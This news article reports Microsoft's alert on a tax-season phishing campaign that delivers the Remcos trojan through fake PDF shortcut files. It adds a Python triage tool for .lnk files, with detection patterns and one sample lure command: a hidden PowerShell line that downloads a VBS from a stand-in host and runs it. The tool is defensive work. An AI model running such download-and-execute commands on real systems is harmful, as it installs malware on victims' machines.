Microsoft: Phishing email attacks targeting accountants near Tax Day 

Published April 17, 2023
Author: Ash Khan

Microsoft has issued an alert about a phishing campaign targeting tax preparers and accounting firms. The emails deliver a remote access trojan that gives the attackers an initial foothold on business networks. 

As the United States approaches the end of its annual tax season, accountants are scrambling to collect their clients’ tax records. 

This makes it a prime opportunity for threat actors to target tax preparers, in the hope that, in the rush, they will open a malicious file without a second look. 

Microsoft has identified a new phishing campaign aimed at tax professionals that is designed to deliver Remcos, a remote access trojan. 

With U.S. Tax Day approaching, Microsoft says it has been observing these attacks since February of this year; they target accounting and tax return preparation organisations, deliver Remcos, and use it to compromise the victims’ networks. 

Focusing on tax experts 

The phishing emails appear to come from clients sending in the paperwork needed to complete their tax returns. 

One phishing email spotted by Microsoft reads: “I apologise for not responding sooner; our tax return should be simple and not require much of your time. I think you’d need a copy of our most recent year’s tax paperwork for the W-2s, 1099s, mortgages, interest, gifts, medical investments, and HSAs.” 

The emails contain links that pass through legitimate click-tracking services, which helps them evade detection by security software. The URLs eventually lead the user to a file-hosting site from which a ZIP archive is downloaded. 

Several files in the archive are named to look like PDFs of different tax forms, but they are actually Windows shortcut (.lnk) files. 

When double-clicked, these shortcuts launch PowerShell to download a heavily obfuscated VBS file from a remote site, save it to C:\Windows\Tasks, and run it. 

To avoid raising the victim’s suspicion, the VBS script also downloads a decoy PDF file and opens it, so the user sees what looks like the expected document. 

The VBS script then downloads and executes GuLoader, which, according to Microsoft, in turn installs the Remcos remote access trojan. 

Microsoft notes that Remcos is frequently used in phishing campaigns to obtain initial access to corporate networks. 

With that foothold, the attackers infect further devices, move laterally through the network, steal data and install additional malware. 

Microsoft says phishing campaigns frequently use tax-related themes, but this one is unusual in that it specifically targets tax preparation businesses and the individuals who work for them. 

“These campaigns are specific and targeted in a way that is unusual, though social engineering traps like this one are common around Tax Day and other hot-button current events,” Microsoft said. 

Targeted Businesses

The campaign mainly targets businesses that prepare taxes or provide financial, professional tax and bookkeeping services. 

A breach at an accounting firm affects many people, because such firms handle extremely sensitive information for both individuals and businesses. 

Because the initial loaders in this campaign are shortcut files masquerading as PDFs, users are advised to enable the display of file extensions in Windows so that suspicious files are easier to recognise. 

Unfortunately, Windows shortcuts are a special case: even though they carry the .lnk extension, File Explorer never shows it, regardless of the file-extension setting. A file named “W-2.pdf.lnk” is therefore displayed simply as “W-2.pdf”. 

This behaviour makes it harder to tell whether a file is really a disguised shortcut. Switching File Explorer to the ‘Details’ view does help, however, because the Type column then shows the file as a Shortcut rather than a PDF document. 

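Since Explorer hides the .lnk extension, the reliable way to triage an archive like the one described above is to read the shortcuts themselves: the StringData section of a shell link records the relative target, the command-line arguments and the icon the shortcut borrows. The following added example (my own code, not Microsoft’s or the article’s) is a minimal MS-SHLLINK parser plus heuristics matching the chain described here: a PDF-looking shortcut whose target is PowerShell, whose arguments fetch a file into C:\Windows\Tasks, and which borrows a PDF reader’s icon. The two sample shortcuts are constructed in memory, the host example.invalid and all paths are invented, and the heuristics are illustrative rather than a vendor signature.

```python
"""Triage .lnk files from a suspicious ZIP (added example, not from the Microsoft report).

A minimal MS-SHLLINK parser pulls out what a shortcut actually launches, and
triage_lnk() applies heuristics for the chain described in the article:
a PDF-looking shortcut that runs PowerShell to fetch a VBS into C:\\Windows\\Tasks.
The two sample shortcuts are constructed in memory; host and paths are invented.
"""
import re
import struct

# HeaderSize 0x4C followed by the ShellLink CLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = bytes.fromhex("4c000000 01140200 00000000 c0000000 00000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) and the fixed order of the StringData fields.
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_DATA = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
               (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
               (HAS_ICON, "icon_location")]

# Heuristics (my own, tuned to the article's description, not a vendor signature).
DECOY_NAME = re.compile(r"\.(pdf|docx?|xlsx?)\.lnk$", re.I)
SCRIPT_HOST = re.compile(r"(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32)(\.exe)?\b", re.I)
DOWNLOAD_CUE = re.compile(r"iwr|invoke-webrequest|downloadstring|downloadfile|https?://|-enc|bypass|hidden", re.I)
STAGING_DIR = re.compile(r"c:\\windows\\tasks\\", re.I)
DOCUMENT_ICON = re.compile(r"acro|reader|\.pdf$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link; ExtraData blocks are ignored."""
    if data[:20] != LNK_MAGIC:
        raise ValueError("not a Windows shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                        # end of the fixed ShellLinkHeader
    if flags & HAS_ID_LIST:                         # LinkTargetIDList: u16 size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                       # LinkInfo: u32 total size comes first
        pos += struct.unpack_from("<I", data, pos)[0]
    width, enc = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    fields = {}
    for flag, name in STRING_DATA:                  # each: u16 char count, then the chars
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            fields[name] = data[pos:pos + count * width].decode(enc)
            pos += count * width
    return fields


def build_lnk(relative_path: str, arguments: str = "", icon_location: str = "") -> bytes:
    """Build a minimal Unicode shell link (only used to construct the samples below)."""
    flags = IS_UNICODE | HAS_REL_PATH
    flags |= HAS_ARGS if arguments else 0
    flags |= HAS_ICON if icon_location else 0
    header = LNK_MAGIC + struct.pack("<I", flags) + bytes(76 - 24)   # zero the rest

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(relative_path)
    body += string_data(arguments) if arguments else b""
    body += string_data(icon_location) if icon_location else b""
    return header + body


def triage_lnk(filename: str, data: bytes) -> list:
    """Return finding codes for one shortcut; an empty list means nothing matched."""
    f = parse_lnk(data)
    target, args, icon = f.get("relative_path", ""), f.get("arguments", ""), f.get("icon_location", "")
    findings = []
    if DECOY_NAME.search(filename):                 # Explorer hides .lnk, so x.pdf.lnk shows as x.pdf
        findings.append("double_extension")
    if SCRIPT_HOST.search(target):
        findings.append("script_host_target")
    if DOWNLOAD_CUE.search(args):
        findings.append("download_cmdline")
    if STAGING_DIR.search(args):
        findings.append("drops_to_windows_tasks")
    if icon and DOCUMENT_ICON.search(icon) and SCRIPT_HOST.search(target):
        findings.append("document_icon_mismatch")   # PDF reader's icon, but runs a script host
    return findings


# Constructed samples: one lure shaped like the article's chain, one benign shortcut.
SAMPLES = {
    "W-2_2022.pdf.lnk": build_lnk(
        r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'-w hidden -ep bypass -c "iwr http://example.invalid/f -OutFile C:\Windows\Tasks\f.vbs; wscript C:\Windows\Tasks\f.vbs"',
        r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe"),
    "Tax_Return_2022.lnk": build_lnk(r"..\Documents\Tax_Return_2022.pdf"),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name}: {triage_lnk(name, blob) or 'clean'}")
```

In practice you would feed `triage_lnk()` the member names and bytes read from the downloaded archive with the standard `zipfile` module rather than the constructed samples; because the parser works on the raw file, it sees the real name with its .lnk extension that File Explorer would have hidden. Real shortcuts usually also carry a LinkTargetIDList and LinkInfo, which the parser skips over using their own size fields, so the StringData offsets still line up.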

Users should not open attachments or click links in emails without first confirming that the sender is genuine. If that cannot be established, delete the email.